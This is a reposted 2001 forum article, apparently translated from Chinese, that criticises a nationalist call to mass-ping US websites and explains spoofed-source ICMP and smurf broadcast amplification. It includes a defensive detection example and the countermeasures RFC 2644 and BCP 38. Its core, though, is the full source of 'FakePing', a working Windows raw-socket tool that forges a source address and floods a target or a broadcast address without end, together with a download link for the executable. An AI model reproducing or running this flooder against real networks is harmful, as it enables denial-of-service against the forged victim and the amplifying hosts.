Ping flood attack (reproduced)

Reposted by zhaozj, 2021-02-08

Posted from: BBS Shuimu Tsinghua Station (Fri May 11 22:26:59 2001)

Author: shotgun

Lately a lot of people have been calling on everyone to go and ping some website. I don't understand the politics, but from a technical point of view every denial-of-service attack, whatever its kind, has to satisfy one condition: spend the least of your own resources to cause the greatest consumption on the target. Seen that way, everyone going off to ping is not just odd (trading our maximum effort for the other side's minimum damage); it is also ridiculous: people's war was something from more than fifty years ago, and in the Internet era having more people does not count for much.

A basic fact: the center of the Internet is in the United States, and China's part is only a small branch of it (roughly what a metropolitan area network is in the US). Our cable to North America is called the "North America exit". What does that mean? A door; in other words, a bottleneck. So what happens when everyone goes to ping? The first thing to die is China's own exit gateway (the China-North America exit bandwidth is only in the gigabit range; wide? who are you kidding?). Of course North America gets a rest as well, since we obviously can no longer see American websites, and those who like playing Ah Q may as well tell others: "America has been blown flat!" (Strange? It is no different from putting up a "hacked" White House page of your own.) Is that what we want? Better still, close the borders, unplug the Internet, dream of a strong nation at home, and imagine we are still in the mighty Tang dynasty with all the world coming to pay tribute.

Enough chatter. Today's subject is ping. Ping is a tool that probes whether a network host is alive by sending ICMP packets (Type 8, Code 0, echo request). For a long time some operating systems (Win95, for example) could not handle oversized ping packets, which gave rise to the Ping of Death attack (crash the other side with huge ping packets, or simply choke the network with them). With upgraded operating systems, more bandwidth and faster hardware, a big ping packet on its own has basically no attack effect any more (distributed attacks aside). If you insist on attacking a host with ping packets, you have to exploit some other feature of TCP/IP, or a defect in the network topology, to amplify the attack strength (so-called positive feedback).

Under normal circumstances the ping exchange looks like this:

Host A sends an ICMP 8,0 (echo request) to host B, and host B answers host A with an ICMP 0,0 (echo reply).

Now forge the source address so that the reply is misdirected to host C:

Host A ---------------------> Host B -----------------> Host C
        echo request, source forged as C      echo reply, delivered to C

In this case host A only has to keep sending ping packets and never has to process the echo replies that come back, so the attack strength is doubled; and in fact both host B and host C are targets of the attack, while A leaves no trace of itself. It is a way of staying hidden, and it kills two birds with one stone.

The method above is easy to implement by forging the IP header on a SOCK_RAW socket. But even doubled, the attack strength does not amount to much. What then? Let the enemy do the heavy lifting for us. There is a concept in TCP/IP called broadcast: every host on a segment receives packets sent to the segment's broadcast address (just like a radio broadcast). So what if...? Right! If we send an ICMP echo packet to the broadcast address (that is, ping the broadcast address), we get a great many responses: every host on the Ethernet that accepts broadcast packets answers with an ICMP_ECHOREPLY. To test this, ping your LAN's broadcast address from a Unix machine and you will see a lot of replies flagged DUP (duplicates, because one request drew replies from many hosts). Microsoft's ping program does not handle multiple responses to one request; after the first reply it drops the rest. Likewise Microsoft systems do not answer packets sent to the broadcast address by default, so it is best to test on a network with plenty of UNIX hosts.

Having read this far, you surely know what I am getting at. Right: when we send a ping request to a broadcast address with a forged source, every host behind that broadcast address answers the request, and of course they answer the host whose address was forged (each of them believes that host did the pinging). This way the attack strength is amplified N times (N being the number of hosts that answer the ping).

Two well-known countermeasures close this off. Since RFC 2644 (1999) routers are expected to drop IP directed broadcasts by default, so a request aimed at another network's broadcast address never reaches that segment from outside; and ingress filtering (RFC 2827, BCP 38) discards packets whose source address does not belong to the network they arrive from, which stops the forged source at the first hop.
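As an added example (not shotgun's FakePing and not code from the original post), the C below builds the two kinds of datagram discussed above in memory, a spoofed-source echo request to a directed-broadcast address and the echo replies it draws, and then applies the checks a monitoring point on the amplifier LAN would use to recognise the pattern: an echo request addressed to the subnet's broadcast address (the trigger), whether its claimed source lies outside that subnet (which should be impossible if the upstream router drops directed broadcasts), and how many replies land on one victim (the amplification factor N). It also serves the misdirected-reply case from the A/B/C diagram, since a reply to a host that never sent a request is what the victim sees in both cases. All addresses (10.0.0.5 as the victim, 192.168.1.0/24 as the amplifier LAN) and packet contents are constructed sample data, and the function names are my own.

```c
/* Added example, not code from the original post: build spoofed ICMP echo
 * datagrams in memory and run smurf-style detection checks over them.
 * Addresses and payloads below are constructed sample data. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IPV4_HLEN      20
#define ICMP_HLEN      8
#define ICMP_ECHO      8
#define ICMP_ECHOREPLY 0
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                         ((uint32_t)(c) << 8) | (uint32_t)(d))

static const uint32_t VICTIM   = IP4(10, 0, 0, 5);       /* spoofed source */
static const uint32_t LAN_NET  = IP4(192, 168, 1, 0);    /* amplifier LAN */
static const uint32_t LAN_MASK = IP4(255, 255, 255, 0);

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static uint32_t get32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* RFC 1071 one's-complement checksum. Over a header whose checksum field is
 * already filled in, the result is 0 exactly when the header is intact. */
static uint16_t inet_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) { sum += ((uint32_t)buf[0] << 8) | buf[1]; buf += 2; len -= 2; }
    if (len) sum += (uint32_t)buf[0] << 8;          /* odd trailing byte */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Write an IPv4 datagram carrying an ICMP echo message into out (at least
 * IPV4_HLEN + ICMP_HLEN + plen bytes). src is whatever the caller claims,
 * which is all that source spoofing amounts to. Returns the datagram length. */
static size_t build_icmp(uint8_t *out, uint32_t src, uint32_t dst, uint8_t type,
                         const uint8_t *payload, size_t plen)
{
    size_t len = IPV4_HLEN + ICMP_HLEN + plen;
    uint8_t *ip = out, *icmp = out + IPV4_HLEN;
    memset(out, 0, len);
    ip[0] = 0x45;                                   /* version 4, 5 header words */
    put16(ip + 2, (uint16_t)len);                   /* total length */
    put16(ip + 4, 0x1234);                          /* identification, arbitrary */
    ip[8] = 128;                                    /* TTL */
    ip[9] = 1;                                      /* protocol: ICMP */
    put32(ip + 12, src);
    put32(ip + 16, dst);
    put16(ip + 10, inet_checksum(ip, IPV4_HLEN));   /* IP checksum: header only (RFC 791) */
    icmp[0] = type;                                 /* code stays 0 */
    put16(icmp + 4, 2);                             /* identifier */
    put16(icmp + 6, 999);                           /* sequence */
    memcpy(icmp + ICMP_HLEN, payload, plen);
    put16(icmp + 2, inet_checksum(icmp, ICMP_HLEN + plen)); /* ICMP checksum: header + data */
    return len;
}

/* 1 if pkt is an ICMP echo request aimed at the directed-broadcast address of
 * net/mask (or the limited broadcast), the trigger packet of a smurf flood.
 * *from_outside reports whether the claimed source lies outside net/mask. */
static int is_smurf_trigger(const uint8_t *pkt, size_t len, uint32_t net,
                            uint32_t mask, int *from_outside)
{
    if (len < IPV4_HLEN + ICMP_HLEN || (pkt[0] >> 4) != 4) return 0;
    size_t hl = (size_t)(pkt[0] & 0x0f) * 4;
    if (hl < IPV4_HLEN || len < hl + ICMP_HLEN) return 0;
    if (inet_checksum(pkt, hl) != 0) return 0;      /* damaged header: ignore */
    if (pkt[9] != 1 || pkt[hl] != ICMP_ECHO) return 0;
    uint32_t src = get32(pkt + 12), dst = get32(pkt + 16);
    if (dst != (net | ~mask) && dst != 0xffffffffu) return 0;
    if (from_outside) *from_outside = (src & mask) != (net & mask);
    return 1;
}

/* Count echo replies addressed to victim in a batch of captured datagrams:
 * with one spoofed request in, this is the amplification factor N. */
static int count_replies_to(const uint8_t *const *pkts, const size_t *lens, int n, uint32_t victim)
{
    int count = 0;
    for (int i = 0; i < n; i++) {
        const uint8_t *p = pkts[i];
        if (lens[i] < IPV4_HLEN + ICMP_HLEN || (p[0] >> 4) != 4 || p[9] != 1) continue;
        size_t hl = (size_t)(p[0] & 0x0f) * 4;
        if (lens[i] < hl + ICMP_HLEN) continue;
        if (p[hl] == ICMP_ECHOREPLY && get32(p + 16) == victim) count++;
    }
    return count;
}

/* Constructed capture: one forged request to the LAN broadcast address and
 * the replies of three LAN hosts. Returns 1 when every check fires as expected. */
static int demo(void)
{
    static uint8_t bufs[4][64];
    static const uint8_t data[4] = {'E', 'E', 'E', 'E'};
    const uint8_t *pkts[4]; size_t lens[4]; int outside = 0;
    lens[0] = build_icmp(bufs[0], VICTIM, LAN_NET | ~LAN_MASK, ICMP_ECHO, data, 4);
    for (int i = 1; i < 4; i++)
        lens[i] = build_icmp(bufs[i], IP4(192, 168, 1, 9 + i), VICTIM, ICMP_ECHOREPLY, data, 4);
    for (int i = 0; i < 4; i++) pkts[i] = bufs[i];
    int trig = is_smurf_trigger(pkts[0], lens[0], LAN_NET, LAN_MASK, &outside);
    int n = count_replies_to(pkts, lens, 4, VICTIM);
    printf("trigger=%d from_outside=%d replies_to_victim=%d\n", trig, outside, n);
    return trig && outside && n == 3;
}

int main(void) { return demo() ? 0 : 1; }
```

The two checksum scopes are the point to keep straight when building or validating these packets: the IPv4 checksum covers the 20-byte header only, the ICMP checksum covers the ICMP header plus all of its data, and inet_checksum returning 0 over a received header is the standard receive-side verification.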

I wrote a FakePing tool, which can be downloaded from http://www.patching.net/shotgun/fakeping.exe. Usage is fakeping.exe fakeip targetip [packetsize]; if targetip is a broadcast address, fakeip is the attack target.

The source code is given below (written in a hurry, so it is rather messy; don't laugh): */

//////////////////////////////////////////////////////
//                                                  //
//          fakeping for win2k by shotgun           //
//                                                  //
//  Released: [2001.4]                              //
//  Author:   [Shotgun]                             //
//  HomePage: [http://it.xici.net]                  //
//            [http://www.patching.net]             //
//                                                  //
//////////////////////////////////////////////////////

#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32.lib")   // link against Winsock 2

#define SEQ           0x28376839
#define STATUS_FAILED 0xFFFF         // error return value

typedef struct _iphdr                // IP header
{
    unsigned char  h_verlen;         // 4-bit header length, 4-bit IP version
    unsigned char  tos;              // 8-bit type of service
    unsigned short total_len;        // 16-bit total length (bytes)
    unsigned short ident;            // 16-bit identification
    unsigned short frag_and_flags;   // 3-bit flags, 13-bit fragment offset
    unsigned char  ttl;              // 8-bit time to live
    unsigned char  proto;            // 8-bit protocol (TCP, UDP or other)
    unsigned short checksum;         // 16-bit IP header checksum
    unsigned int   sourceIP;         // 32-bit source IP address
    unsigned int   destIP;           // 32-bit destination IP address
} IP_HEADER;

typedef struct _ihdr                 // ICMP header
{
    BYTE   i_type;                   // 8-bit type
    BYTE   i_code;                   // 8-bit code
    USHORT i_cksum;                  // 16-bit checksum
    USHORT i_id;                     // identifier (usually the process id)
    USHORT i_seq;                    // sequence number
    ULONG  timestamp;                // timestamp (first 4 bytes of the data)
} ICMP_HEADER;

// checksum: Internet (one's complement) checksum over a buffer
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;
    while (size > 1) {
        cksum += *buffer++;
        size  -= sizeof(USHORT);
    }
    if (size) {
        cksum += *(UCHAR *)buffer;   // odd trailing byte
    }
    cksum  = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}

// fakeping main function
int main(int argc, char **argv)
{
    int   datasize, errorcode, counter, flag;
    int   timeout = 2000, sendSEQ = 0, PacketSize = 32;
    char  SendBuf[65535] = {0};
    WSADATA wsaData;
    SOCKET SockRaw = (SOCKET)NULL;
    struct sockaddr_in DestAddr;
    IP_HEADER ip_header;
    ICMP_HEADER icmp_header;
    char FakeSourceIP[20], DestIP[20];

    // parse the command line
    if (argc < 3)
    {
        printf("FakePing by Shotgun\n");
        printf("\tThis program can do ping-flooding from a fake IP\n");
        printf("\tUsing a broadcast address as the destination IP will enhance the effect\n");
        printf("Email:\n");
        printf("\tshotgun@xici.net\n");
        printf("Homepage:\n");
        printf("\thttp://it.xici.net\n");
        printf("\thttp://www.patching.net\n");
        printf("Usage:\n\tfakeping.exe FakeSourceIP DestinationIP [PacketSize]\n");
        printf("Example:\n");
        printf("\tfakeping.exe 192.168.15.23 192.168.15.255\n");
        printf("\tfakeping.exe 192.168.15.23 192.168.15.200 6400\n");
        exit(0);
    }
    strncpy(FakeSourceIP, argv[1], sizeof(FakeSourceIP) - 1);
    FakeSourceIP[sizeof(FakeSourceIP) - 1] = '\0';
    strncpy(DestIP, argv[2], sizeof(DestIP) - 1);
    DestIP[sizeof(DestIP) - 1] = '\0';
    if (argc > 3) PacketSize = atoi(argv[3]);
    if (PacketSize < 0 || PacketSize > 60000)
    {
        printf("Error! Packet size too big, must be < 60K\n");
        exit(0);
    }
    printf("Now fake %s ping %s using packet size = %d bytes\n",
           FakeSourceIP, DestIP, PacketSize);
    printf("\tCtrl-C to quit\n");

    // initialise Winsock and open the raw socket
    if ((errorcode = WSAStartup(MAKEWORD(2, 1), &wsaData)) != 0)
    {
        fprintf(stderr, "WSAStartup failed: %d\n", errorcode);
        ExitProcess(STATUS_FAILED);
    }
    if ((SockRaw = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
    {
        fprintf(stderr, "WSASocket() failed: %d\n", WSAGetLastError());
        ExitProcess(STATUS_FAILED);
    }
    flag = TRUE;
    // IP_HDRINCL: we supply our own IP header, which is what allows the forged source address
    errorcode = setsockopt(SockRaw, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
    if (errorcode == SOCKET_ERROR)
        printf("Set IP_HDRINCL error!\n");

    __try {
        // set the send timeout
        errorcode = setsockopt(SockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
        if (errorcode == SOCKET_ERROR)
        {
            fprintf(stderr, "Failed to set send timeout: %d\n", WSAGetLastError());
            __leave;
        }
        memset(&DestAddr, 0, sizeof(DestAddr));
        DestAddr.sin_family      = AF_INET;
        DestAddr.sin_addr.s_addr = inet_addr(DestIP);

        // fill in the IP header
        ip_header.h_verlen       = (4 << 4 | sizeof(ip_header) / sizeof(unsigned long)); // high 4 bits: version, low 4 bits: header length in 32-bit words
        ip_header.total_len      = htons(sizeof(ip_header) + sizeof(icmp_header) + PacketSize); // 16-bit total length in bytes
        ip_header.ident          = 1;                      // 16-bit identification
        ip_header.frag_and_flags = 0;                      // flags and fragment offset
        ip_header.ttl            = 128;                    // 8-bit TTL
        ip_header.proto          = IPPROTO_ICMP;           // 8-bit protocol
        ip_header.checksum       = 0;                      // computed below
        ip_header.sourceIP       = inet_addr(FakeSourceIP); // 32-bit source: the forged address
        ip_header.destIP         = inet_addr(DestIP);      // 32-bit destination

        // fill in the ICMP header
        icmp_header.i_type    = 8;                         // echo request
        icmp_header.i_code    = 0;
        icmp_header.i_cksum   = 0;
        icmp_header.i_id      = 2;
        icmp_header.timestamp = 999;
        icmp_header.i_seq     = 999;

        // the ICMP checksum covers the ICMP header plus the data
        memcpy(SendBuf, &icmp_header, sizeof(icmp_header));
        memset(SendBuf + sizeof(icmp_header), 'E', PacketSize);
        icmp_header.i_cksum = checksum((USHORT *)SendBuf, sizeof(icmp_header) + PacketSize);

        // assemble the datagram: IP header, ICMP header, data
        memcpy(SendBuf, &ip_header, sizeof(ip_header));
        memcpy(SendBuf + sizeof(ip_header), &icmp_header, sizeof(icmp_header));
        memset(SendBuf + sizeof(ip_header) + sizeof(icmp_header), 'E', PacketSize);
        datasize = sizeof(ip_header) + sizeof(icmp_header) + PacketSize;

        // the IP checksum covers the IP header only (RFC 791)
        ip_header.checksum = checksum((USHORT *)SendBuf, sizeof(ip_header));
        memcpy(SendBuf, &ip_header, sizeof(ip_header));

        while (1)
        {
            Sleep(100);
            printf(".");
            for (counter = 0; counter < 1024; counter++)
            {
                // send the forged ICMP packet
                errorcode = sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr *)&DestAddr, sizeof(DestAddr));
                if (errorcode == SOCKET_ERROR) printf("\nSend error: %d\n", WSAGetLastError());
            }
        }
    } // end of try
    __finally {
        if (SockRaw != INVALID_SOCKET) closesocket(SockRaw);
        WSACleanup();
    }
    return 0;
}

/*

Conclusion:

Patriotism is necessary, and so is enthusiasm, but technology does not tolerate the slightest fakery and does not run on impulse; it has to rest on solid ground. FakePing is nothing new on the Internet; the Americans we are now so eager to attack achieved it long ago. How many people are we going to organize now? Archimedes, relying on wisdom and knowledge, once used mirrors to defend his home city; must we still rely on impulse and blindness to make the nation strong?

Less impulse and blindness, more hard work; otherwise it will still be hard going.

Patching heroes ......

China


Supplement, dated 2001-05-06 11:16:07:

The purpose of writing this article is not to call on everyone to attack US sites with the FakePing tool, just to show a little of what can be done with technical skill.

If everyone pinging is the Boxers, going up against cannons with "knives and spears that bullets cannot pierce", then FakePing is at best a musket, while the United States has built aircraft carriers (operating systems). What can broadswords, spears and muskets do against that?

This is tragic, but is there no other way? Can we not go back and build our own warships?

If the Second Artillery came out to ping too, if the technicians at Xichang also went off to "exercise" like this, we would not have a country left!

Please cite the original when reposting: https://www.9cbs.com/read-1744.html
